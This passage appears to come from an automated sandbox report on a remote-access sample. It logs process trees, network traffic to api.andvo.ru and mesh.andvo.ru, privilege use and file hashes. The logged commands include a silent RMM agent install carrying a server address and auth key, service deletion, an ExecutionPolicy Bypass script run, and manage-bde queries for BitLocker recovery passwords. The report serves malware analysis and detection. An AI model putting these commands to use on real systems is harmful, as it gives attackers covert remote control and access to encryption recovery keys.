| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\TacticalAgent\tacticalrmm.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-QCL73.tmp\tacticalagent-v2.8.0-windows-amd64.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-10-06_87bda56ec572e8e748aeafba3e75755c_poet-rat_snatch.exe"
C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe
C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe /VERYSILENT /SUPPRESSMSGBOXES
C:\Users\Admin\AppData\Local\Temp\is-QCL73.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QCL73.tmp\tacticalagent-v2.8.0-windows-amd64.tmp" /SL5="$702CA,3652845,825344,C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe" /VERYSILENT /SUPPRESSMSGBOXES
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\net.exe
net stop tacticalrpc
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tacticalrpc
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c net stop tacticalagent
C:\Windows\SysWOW64\net.exe
net stop tacticalagent
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tacticalagent
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrmm
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\net.exe
net stop tacticalrmm
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tacticalrmm
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM tacticalrmm.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM tacticalrmm.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c sc delete tacticalagent
C:\Windows\SysWOW64\sc.exe
sc delete tacticalagent
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c sc delete tacticalrpc
C:\Windows\SysWOW64\sc.exe
sc delete tacticalrpc
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c tacticalrmm.exe -m installsvc
C:\Program Files\TacticalAgent\tacticalrmm.exe
tacticalrmm.exe -m installsvc
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c net start tacticalrmm
C:\Windows\SysWOW64\net.exe
net start tacticalrmm
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start tacticalrmm
C:\Program Files\TacticalAgent\tacticalrmm.exe
"C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install --api https://api.andvo.ru --client-id 1 --site-id 9 --agent-type workstation --auth 9b1ee2bdfcd29fd46f5c1772d5779c32e8c4a6b87f7ed6246c1a3a07a364ca8b
C:\Program Files\TacticalAgent\meshagent.exe
"C:\Program Files\TacticalAgent\meshagent.exe" -fullinstall
C:\Program Files\Mesh Agent\MeshAgent.exe
"C:\Program Files\Mesh Agent\MeshAgent.exe"
C:\Windows\System32\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\system32\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
C:\Windows\System32\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
C:\Windows\system32\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
C:\Windows\System32\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\System32\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -noprofile -nologo -command -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -noprofile -nologo -command -
C:\Program Files\Mesh Agent\MeshAgent.exe
"C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -noprofile -nologo -command -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -noprofile -nologo -command -
C:\Windows\system32\cmd.exe
/c manage-bde -protectors -get C: -Type recoverypassword
C:\Windows\system32\manage-bde.exe
manage-bde -protectors -get C: -Type recoverypassword
C:\Windows\system32\cmd.exe
/c manage-bde -protectors -get F: -Type recoverypassword
C:\Windows\system32\manage-bde.exe
manage-bde -protectors -get F: -Type recoverypassword
C:\Program Files\TacticalAgent\tacticalrmm.exe
"C:\Program Files\TacticalAgent\tacticalrmm.exe" -m svc
C:\Program Files\Mesh Agent\MeshAgent.exe
"C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass C:\ProgramData\TacticalRMM\565931752.ps1
C:\Program Files\TacticalAgent\tacticalrmm.exe
"C:\Program Files\TacticalAgent\tacticalrmm.exe" -m checkrunner
C:\Windows\System32\setx.exe
"C:\Windows\System32\setx.exe" ChocolateyLastPathUpdate 133726959027236644
C:\Windows\System32\setx.exe
"C:\Windows\System32\setx.exe" ChocolateyLastPathUpdate 133726959028037110
C:\Windows\System32\setx.exe
"C:\Windows\System32\setx.exe" ChocolateyLastPathUpdate 133726959029274793
C:\Windows\System32\setx.exe
"C:\Windows\System32\setx.exe" ChocolateyLastPathUpdate 133726959035095708
C:\ProgramData\chocolatey\choco.exe
"C:\ProgramData\chocolatey\choco.exe" -v
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.andvo.ru | udp |
| NL | 185.229.65.114:443 | api.andvo.ru | tcp |
| NL | 185.229.65.114:443 | api.andvo.ru | tcp |
| US | 8.8.8.8:53 | 114.65.229.185.in-addr.arpa | udp |
| NL | 185.229.65.114:443 | api.andvo.ru | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mesh.andvo.ru | udp |
| NL | 185.229.65.114:443 | mesh.andvo.ru | tcp |
| NL | 185.229.65.114:443 | mesh.andvo.ru | tcp |
| NL | 185.229.65.114:443 | mesh.andvo.ru | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | icanhazip.tacticalrmm.io | udp |
| US | 172.67.169.135:443 | icanhazip.tacticalrmm.io | tcp |
| US | 8.8.8.8:53 | 135.169.67.172.in-addr.arpa | udp |
| NL | 185.229.65.114:443 | mesh.andvo.ru | tcp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| NL | 185.229.65.114:443 | mesh.andvo.ru | tcp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| NL | 185.229.65.114:443 | mesh.andvo.ru | tcp |
| US | 172.67.169.135:443 | icanhazip.tacticalrmm.io | tcp |
| NL | 185.229.65.114:443 | mesh.andvo.ru | tcp |
| NL | 185.229.65.114:443 | mesh.andvo.ru | tcp |
| US | 8.8.8.8:53 | chocolatey.org | udp |
| NL | 185.229.65.114:443 | mesh.andvo.ru | tcp |
| US | 104.18.20.76:443 | chocolatey.org | tcp |
| US | 8.8.8.8:53 | community.chocolatey.org | udp |
| NL | 185.229.65.114:443 | mesh.andvo.ru | tcp |
| US | 104.18.21.76:443 | community.chocolatey.org | tcp |
| NL | 185.229.65.114:443 | mesh.andvo.ru | tcp |
| US | 8.8.8.8:53 | 76.21.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.20.18.104.in-addr.arpa | udp |
| NL | 185.229.65.114:443 | mesh.andvo.ru | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 104.18.21.76:443 | community.chocolatey.org | tcp |
| US | 104.18.21.76:443 | community.chocolatey.org | tcp |
| US | 52.252.198.179:443 | tcp | |
| US | 8.8.8.8:53 | download.windowsupdate.com | udp |
| GB | 2.23.210.88:80 | download.windowsupdate.com | tcp |
| NL | 185.229.65.114:443 | mesh.andvo.ru | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| NL | 185.229.65.114:443 | mesh.andvo.ru | tcp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
Files
C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe
| MD5 | ed40540e7432bacaa08a6cd6a9f63004 |
| SHA1 | 9c12db9fd406067162e9a01b2c6a34a5c360ea97 |
| SHA256 | d6c7bdab07151678b713a02efe7ad5281b194b0d5b538061bdafdf2c4ca1fdaa |
| SHA512 | 07653d534a998248f897a2ed962d2ec83947c094aa7fe4fb85e40cb2771754289fe2cef29e31b5aa08e8165d5418fe1b8049dedc653e799089d5c13e02352e8d |
memory/3236-5-0x0000000000400000-0x00000000004D7000-memory.dmp
memory/3236-8-0x0000000000401000-0x00000000004B7000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-QCL73.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
| MD5 | a639312111d278fee4f70299c134d620 |
| SHA1 | 6144ca6e18a5444cdb9b633a6efee67aff931115 |
| SHA256 | 4b0be5167a31a77e28e3f0a7c83c9d289845075b51e70691236603b1083649df |
| SHA512 | f47f01d072ff9ed42f5b36600ddfc344a6a4b967c1b671ffc0e76531e360bfd55a1a9950305ad33f7460f3f5dd8953e317b108cd434f2db02987fa018d57437c |
memory/3972-12-0x0000000000400000-0x0000000000712000-memory.dmp
C:\Program Files\TacticalAgent\tacticalrmm.exe
| MD5 | 6cfbd2da5f304a3b8972eafe6fe4d191 |
| SHA1 | 09c1600064cb9d157c55c88f76f107373404b2ae |
| SHA256 | ad29d4e9e01870ffbdb6f2498e6ce36a708e56db2ad431ba2d80bf5a6caac069 |
| SHA512 | 03a29d2eb00a97b3fc83e55a8b8b1fe3e7adbb06fe598ed5525bb3764caced0bf5a28a3fd70e36b66687fcce5a9e7c9243ee6ab3a82d394044f3c60714a423e8 |
memory/3972-26-0x0000000000400000-0x0000000000712000-memory.dmp
memory/3236-27-0x0000000000400000-0x00000000004D7000-memory.dmp
C:\Program Files\TacticalAgent\meshagent.exe
| MD5 | 32e747eda182352f2f1883979b8eccab |
| SHA1 | 14f401fdef9f5a9b11a1cfdc4ea14aede4339acb |
| SHA256 | 2e94c1f68d529edecec9184ee10a3383153752ff57018585d7b491b1ebb6157c |
| SHA512 | 1f226a5f8137739bb896239a1a995d84abd7d07e4ef091b367b4c11d9b6bcda20adc95c2fdfb6bac8fb8d55ceea61068c2503ff1421050046783d2f8489ed992 |
memory/376-65-0x000001D620990000-0x000001D6209B2000-memory.dmp
C:\Windows\Temp\__PSScriptPolicyTest_pr4qp52v.2mc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/376-70-0x000001D63AFF0000-0x000001D63B034000-memory.dmp
memory/376-71-0x000001D63B0C0000-0x000001D63B136000-memory.dmp
C:\Program Files\Mesh Agent\MeshAgent.db.tmp
| MD5 | 559159f7287d47a6ed1aa5e4084eb2e6 |
| SHA1 | f9b103e6cd0f962ea8c3df5273d4680d0356f875 |
| SHA256 | 28283b09b000b8d911d55c4c61cc6020317aacd9905e4983904543c8696489f5 |
| SHA512 | 5bca5284b61c72af314d6c7e9a191c84030aebd61e353a81d5d386e11dfa2d30b100ee945b201d59fd55937a6c42ef20f33dd0834a9290a57f5327aa380594a0 |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 06d16fea6ab505097d16fcaa32949d47 |
| SHA1 | 0c1c719831fa41cd102d0d72d61c0f46ec5b8de8 |
| SHA256 | 54e15de2bef9f651d7717e2a336ac6b2ea2b723e6f29d2b153d8fbbc89aef723 |
| SHA512 | 03c00f1eebb51cec11703141ae9d9c3ac589f5495bc04d8a4b043714089a9d50bd3a520e4d72b4a4c99f5b9bf5f689bf2585fa5c7d4ddbe6f71cbba0172f593a |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 2c0bdf06d302688498d4e7f9cd669ab5 |
| SHA1 | 18186323d93499e03f737f137b4ad795eb7f470b |
| SHA256 | 86cd6b95819282eee4bd6c900b27ebeddf453a90a9f6147978e9137479f36bd6 |
| SHA512 | f8f02ab1cb6906975695369183d00d7f25ec4c54c40aba5ac0a1f42312c5eff5a6774a8e84c3357415555405f7e9754deebe8335dd1fdcf693137ab044cc18fe |
memory/1320-103-0x000002383F060000-0x000002383F07C000-memory.dmp
memory/1320-104-0x000002383F140000-0x000002383F1F5000-memory.dmp
memory/1320-105-0x000002383F050000-0x000002383F05A000-memory.dmp
memory/1320-107-0x000002383F0A0000-0x000002383F0BC000-memory.dmp
memory/1320-108-0x000002383F080000-0x000002383F08A000-memory.dmp
memory/1320-109-0x000002383F220000-0x000002383F23A000-memory.dmp
memory/1320-110-0x000002383F090000-0x000002383F098000-memory.dmp
memory/1320-111-0x000002383F200000-0x000002383F206000-memory.dmp
memory/1320-112-0x000002383F210000-0x000002383F21A000-memory.dmp
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | bda999dc0156fe137e32d675956a6df6 |
| SHA1 | f23c009b8383c1ae87eb2909c1586800906d6678 |
| SHA256 | 5083c7c8c0458ae2ec8c5451997beb78b4179e176f138e224a41d873e1dae79d |
| SHA512 | 59e3662a81db7a87cc8988ed0840bbf30a7082409d23dd3ef9c24d8be9778856af62f08ff4421902201c03fb70f2f01951b4e95e33f9730d781674d8e97688d0 |
memory/824-134-0x00000207C4CC0000-0x00000207C4D75000-memory.dmp
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | f50151eb8229648696902d58b2f6057b |
| SHA1 | 12abb0ca0d99e639d71fbf276edc82403ccbe483 |
| SHA256 | eddc730fff15919a037083d8aef2ff0bead33b6d506dcef9b0cd86cec4b54813 |
| SHA512 | 180e6385cf555d02dd6b17e12400e41c630498e7ebe398cdf92a4af0517e1f79322f01c2fc5cbd35c8357112df4a02f2fb4f077146fed7559e221493bc724742 |
memory/656-157-0x0000021B5F820000-0x0000021B5F84A000-memory.dmp
memory/656-158-0x0000021B5F820000-0x0000021B5F844000-memory.dmp
C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\cryptography-42.0.8.dist-info\INSTALLER
| MD5 | 365c9bfeb7d89244f2ce01c1de44cb85 |
| SHA1 | d7a03141d5d6b1e88b6b59ef08b6681df212c599 |
| SHA256 | ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508 |
| SHA512 | d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1 |
C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\pyasn1\codec\native\__init__.py
| MD5 | 0fc1b4d3e705f5c110975b1b90d43670 |
| SHA1 | 14a9b683b19e8d7d9cb25262cdefcb72109b5569 |
| SHA256 | 1040e52584b5ef6107dfd19489d37ff056e435c598f4e555f1edf4015e7ca67d |
| SHA512 | 8a147c06c8b0a960c9a3fa6da3b30a3b18d3612af9c663ee24c8d2066f45419a2ff4aa3a636606232eca12d7faef3da0cbbd3670a2d72a3281544e1c0b8edf81 |
C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\validators-0.28.3.dist-info\WHEEL
| MD5 | 43136dde7dd276932f6197bb6d676ef4 |
| SHA1 | 6b13c105452c519ea0b65ac1a975bd5e19c50122 |
| SHA256 | 189eedfe4581172c1b6a02b97a8f48a14c0b5baa3239e4ca990fbd8871553714 |
| SHA512 | e7712ba7d36deb083ebcc3b641ad3e7d19fb071ee64ae3a35ad6a50ee882b20cd2e60ca1319199df12584fe311a6266ec74f96a3fb67e59f90c7b5909668aee1 |
C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Lib\site-packages\win32comext\internet\__init__.py
| MD5 | f45c606ffc55fd2f41f42012d917bce9 |
| SHA1 | ca93419cc53fb4efef251483abe766da4b8e2dfd |
| SHA256 | f0bb50af1caea5b284bd463e5938229e7d22cc610b2d767ee1778e92a85849b4 |
| SHA512 | ba7bebe62a6c2216e68e2d484c098662ba3d5217b39a3156b30e776d2bb3cf5d4f31dcdc48a2eb99bc5d80fffe388b212ec707b7d10b48df601430a07608fd46 |
C:\Program Files\TacticalAgent\python\py3.11.9_amd64\Scripts\normalizer.exe
| MD5 | c485a95e68d04b1bce4aa5b4f301d90a |
| SHA1 | 8e0903ca5f0e2982b12c8bb49d4dff94a147a95e |
| SHA256 | 87d309b4470d3f2c21c686e6895fe95aeaee7a3b00948694d39bbe71ed86d169 |
| SHA512 | 3bcfa7fc4fab47f140a8f21b55c09bd593fb2ba3379edc7bb4c60167c46dc440170c7ed1d918c118d8d7e312b4e126086caf87361e87b2e661c8b0434ed81289 |
C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\CF78131CAB33CA407980412C760244BE717C6FAC
| MD5 | db5a0035f45beffc39ef806249d89109 |
| SHA1 | 24a5c979cdb4ace8d4e10269cf7af0236730d809 |
| SHA256 | ba3c0c8d642e194e2727162f4dfad628c03a24298a1945ab5d80adb2f40302a7 |
| SHA512 | cd0f8703ece3d2e7529ed6acdf9061f9fdebc9f51a9fd03856ce10f6471b2dce74fcf29560683b9e57432314c74c2ecf2aec7dc65c376911e433d4c95eae23b6 |
C:\ProgramData\TacticalRMM\565931752.ps1
| MD5 | e9fb33c49bee675e226d1afeef2740d9 |
| SHA1 | ded4e30152638c4e53db4c3c62a76fe0b69e60ab |
| SHA256 | 44e045ed5350758616d664c5af631e7f2cd10165f5bf2bd82cbf3a0bb8f63462 |
